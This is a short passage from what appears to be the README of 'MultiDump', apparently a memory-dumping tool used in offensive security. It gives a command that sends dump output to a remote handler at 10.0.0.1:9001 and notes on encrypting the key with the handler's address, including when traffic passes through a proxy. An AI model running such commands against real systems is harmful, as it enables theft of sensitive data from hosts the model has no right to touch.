Xre0uS/MultiDump/README.md

 ```powershell
 MultiDump.exe -r 10.0.0.1:9001
 ```

-In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.

 The key is encrypted with the handler's IP and port.
 When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`.